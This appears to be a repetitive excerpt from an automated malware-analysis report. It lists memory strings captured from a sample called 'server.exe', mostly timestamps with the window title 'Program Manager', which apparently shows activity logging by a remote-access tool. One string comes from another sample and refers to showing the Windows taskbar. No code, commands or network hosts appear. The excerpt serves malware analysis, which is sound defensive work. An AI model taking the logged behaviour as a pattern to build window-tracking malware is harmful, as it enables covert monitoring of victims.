Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 18:44:49 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 16:52:34 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 23:54:20 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 07:15:37 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 14:05:34 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 17:59:42 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 04:36:51 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 15:05:35 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 05:55:23 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 01:04:24 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 17:22:39 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 16:58:19 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 06:10:33 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 07:29:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 10:05:32 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 00:39:02 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 08:26:26 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 23:02:21 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 22:52:27 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 10:02:59 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/25 | 15:22:18 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 01:12:38 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 16:18:25 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 23:14:36 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 04:33:31 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/25 | 15:25:15 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/07 | 06:28:01 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 12:34:53 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 02:01:36 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 07:19:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 02:06:31 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 06:20:39 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/25 | 13:05:11 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/19 | 23:18:52 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 11:33:04 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 16:25:07 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/07/31 | 02:24:50 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 11:19:54 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 07:30:58 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 23:52:07 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 02:10:22 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 13:58:20 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 14:58:43 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/07/30 | 19:05:18 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 16:27:11 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 12:19:58 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 07:53:39 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 19:59:34 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 04:39:10 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 08:39:18 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 12:45:24 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/07/25 | 07:56:46 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 18:19:23 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/07/25 | 07:59:15 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 20:50:18 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 07:10:51 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 20:07:36 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 01:16:34 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 16:23:46 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 01:47:09 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 14:47:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 06:56:01 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 17:43:07 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 18:36:01 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/30 | 06:18:26 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 16:16:58 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 02:33:55 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 13:23:13 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 08:34:01 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 20:08:04 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 17:54:13 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/28 | 00:40:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 17:46:04 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 22:02:17 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 08:02:59 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 22:52:23 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/30 | 05:22:05 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 23:28:39 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 13:52:06 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 22:36:42 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 12:00:16 - Program Manager
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Shell_traywnd+MostrarBarraDeTarefas
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 15:07:13 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/30 | 04:30:50 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 21:41:25 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 23:09:22 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 20:19:44 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 01:35:55 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 05:13:15 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 14:53:37 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 00:31:36 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 14:41:04 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/07/25 | 07:57:45 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 13:45:44 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 11:08:40 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 17:42:08 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 01:31:59 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 19:39:21 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 07:09:14 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/19 | 22:56:11 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 15:08:07 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 11:17:14 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 00:38:17 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/25 | 12:47:44 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 06:12:44 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 22:38:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 07:41:58 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 06:56:48 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/19 | 23:52:50 - Program Manager
